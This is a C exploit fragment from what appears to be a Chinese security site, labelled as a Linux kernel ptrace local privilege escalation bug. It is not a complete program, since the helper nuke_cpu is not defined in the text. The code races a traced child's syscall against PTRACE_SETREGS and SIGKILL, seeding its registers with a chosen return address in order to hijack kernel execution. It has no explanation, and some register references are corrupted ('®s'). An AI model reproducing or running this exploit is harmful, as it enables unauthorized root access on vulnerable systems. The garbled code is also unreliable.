int once()
{
long i;
int pid0;
int pid;
unsigned long mask = 1;
struct user_regs_struct regs;
assert(!sched_setaffinity(0, sizeof(mask), &mask));
pid = fork();
if (!pid) {
/* V */
while (1) {
/* Put our chosen RIP in callee saved registers */
asm __volatile__ (
"mov $0x1eadbeef, %%rbx\n"
"mov $0x1eadbeef, %%rbp\n"
"mov $0x1eadbeef, %%r12\n"
"mov $0x1eadbeef, %%r13\n"
"mov $0x1eadbeef, %%r14\n"
"mov $0x1eadbeef, %%r15\n"
"mov $0, %%rsi\n"
"mov $0, %%rdi\n"
"mov $0x6d, %%rax\n"
"syscall":::"rax","rsi","rdi",
"r12", "rbx");
}
} else {
/* P */
assert(!ptrace(PTRACE_ATTACH, pid, 0, 0));
wait(NULL);
assert(!ptrace(PTRACE_SETOPTIONS, pid, NULL,
PTRACE_O_TRACESYSGOOD |
PTRACE_O_TRACEFORK |
PTRACE_O_TRACEVFORK |
PTRACE_O_TRACECLONE));
while(1) {
int nuke_pid;
int pid2;
mask = 0xfffe;
assert(!sched_setaffinity(0, sizeof(mask), &mask));
/*Entry */
assert(!ptrace(PTRACE_SYSCALL, pid, NULL, 0, 0));
wait(NULL);
assert(!ptrace(PTRACE_GETREGS, pid, NULL, ®s));
nuke_pid = nuke_cpu();
regs.orig_rax = 0x3c;
pid2 = fork();
if (!pid2) {
/* K */
usleep(120000);
kill(pid, SIGKILL);
printf(".");
fflush(stdout);
exit(0);
}
printf("{");
fflush(stdout);
if (!ptrace(PTRACE_SETREGS, pid, NULL, ®s)) {
printf("+");
} else {
printf("-");
}
ptrace(PTRACE_CONT, pid, NULL, 0, SIGKILL);
kill(pid, SIGKILL);
kill(pid2, SIGKILL);
kill(nuke_pid, SIGKILL);
exit(0);
}
}
}
int main(void) {
while (1) {
int pid = fork();
if (!pid) {
once();
}
wait(NULL);
}
}
Linux Kernel ptrace 功能本地权限提升漏洞(CVE(2)
内容版权声明:除非注明,否则皆为本站原创文章。